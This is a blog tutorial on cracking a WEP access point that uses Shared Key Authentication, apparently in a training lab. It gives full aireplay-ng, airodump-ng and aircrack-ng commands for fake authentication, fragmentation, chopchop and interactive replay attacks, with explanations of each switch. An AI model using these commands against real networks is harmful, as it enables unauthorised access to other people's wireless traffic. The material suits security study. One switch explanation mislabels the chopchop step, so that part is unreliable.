7 – Shared Key Authentication (SKA) Alternative Method

As you have seen in the previous lesson we could not obtain the XOR with the easiest method so instead we have to work a little bit harder and either forge some packets of our own in order authenticate to the access point or maybe even do this with another method…

First of all snippets from the aireplay-ng man page for the fragmentation and chopchop attacks:

Fragmentation:

Pros
– Can obtain the full packet length of 1500 bytes XOR. This
means you can subsequently pretty well create any size of
packet.

– May work where chopchop does not

– Is extremely fast. It yields the XOR stream extremely quickly
when successful.

Cons
– Setup to execute the attack is more subject to the device
drivers. For example, Atheros does not generate the correct
packets unless the wireless card is set to the mac address you
are spoofing.

– You need to be physically closer to the access point since if
any packets are lost then the attack fails.

Chopchop

Pro
– May work where frag does not work.

Cons
– Cannot be used against every access point.

– The maximum XOR bits is limited to the length of the packet
you chopchop against.

– Much slower then the fragmentation attack.

First before we begin we can try a fakeauth with aireplay-ng and see if we have any success:

aireplay-ng –fakeauth 0 -o 1 -e test -a 00:18:E7:XX.XX.XX -h 00:C0:CA:XX:XX:XX mon0 –ignore-negative-one

Look in “man airodump-ng” to see the meaning of the switches used.1 - Try fake authFailure to authenticate looks like the following2 - Fake auth failureNow let’s try a fragmentation attack on the access point so get your card listening with airodump-ng and let’s get to it!3 - airodump startOutput4 - airodump outputFragment attack:

aireplay-ng –fragment -b 00:18:E7:XX:XX:XX -h F4:09:D8:XX:XX:XX mon0

“aireplay-ng” – start aireplay-ng
“–fragment” – running a fragmentation attack
“-b 00:18:E7:XX:XX:XX” – the access point MAC
“-h F4:09:D8:XX:XX:XX” – your MAC address
“mon0” – the monitor interface5 - aireplay fragmentation attackWhen a packet appears accept with either a “y” or “n” and let it run for a bit, you will know fairly quickly if it works or not, an example of this failing is below as you will have a stream of failure and then it will eventually ask you to select yes or no for a new packet.6 - fragmentation failureChop Chop attack:

aireplay-ng –chopchop -b 00:18:E7:XX:XX:XX -h F4:09:D8:XX:XX:XX mon0

“aireplay-ng” – start aireplay-ng
“–chopchop” – running a fragmentation attack
“-b 00:18:E7:XX:XX:XX” – the access point MAC
“-h F4:09:D8:XX:XX:XX” – your MAC address
“mon0” – the monitor interface7 - chopchop failureOutput failure8 - chopchop failureThis AP is quite tricky and I can see why it is recommended for the OWSP training, rather than pulling my hair out though and repeating the same thing again and again expecting different results I had to use an interactive packet replay attack, I could use some other options here also but we will have a look at these at a different time or you could even try them yourself as an extra exercise! The process looks like the following to crack the SKA key on this tricky access point

Leave airodump-ng running on your channel and writing the output to a file with -w:
airodump-ng -c 6 mon0 -w SKA
9 - airodump-ng start
Next run aireplay-ng with an interactive packet replay attack:
aireplay-ng -2 -b 00:18:E7:C5:49:DA -d FF:FF:FF:FF:FF:FF -t 1 mon0
“-2” sets the interactive replay
“-b 00:14:6C:7E:40:80” selects packets with the MAC of the access point you are testing
“-d FF:FF:FF:FF:FF:FF” selects packets with a broadcast destination
“-t 1” selects packets with the “To Distribution System” flag set on
“mon0” your wirless interface
Leave this running for a few minutes, you will see the packets increasing here which is a good thing.
10 - interactive packet replay
Then run aircrack against the pcap to crack the key, select the BSSID you wish to run it against. You should also take note that in the image below I have obtained 31848 IV’s which will definitely help in the cracking process.
Running aircrack is simple with:
aircrack-ng SKA-01.cap
11 - Running Aircrack-ng WEP SKA
 Success looks like this:
12 - WEP SKA Key Cracked with no authentication
This ends the WEP SKA tutorial, let’s move onto the more common “Open System Authentication” as this is the default, most people would not bother changing the default on a router. This is more or a history lesson than anything else, although I still see a lot of WEP around the place and people seem to think hiding it is ok too!
Lesson learned:
Shared Key Authentication even though it sounds like an added security feature adds no security to your access point. It is very easy to obtain the keystream used in the handshake by capturing the challenge frames in the shared key authentication. Data can be easily intercepted and decrypted with share key authentication than with open system authentication. Using open authentication though means any wireless client can connect to the access point but you should use neither as they are clearly very broken for some time now.
 

One thought on “7 – Shared Key Authentication (SKA) Alternative Method

Leave a Reply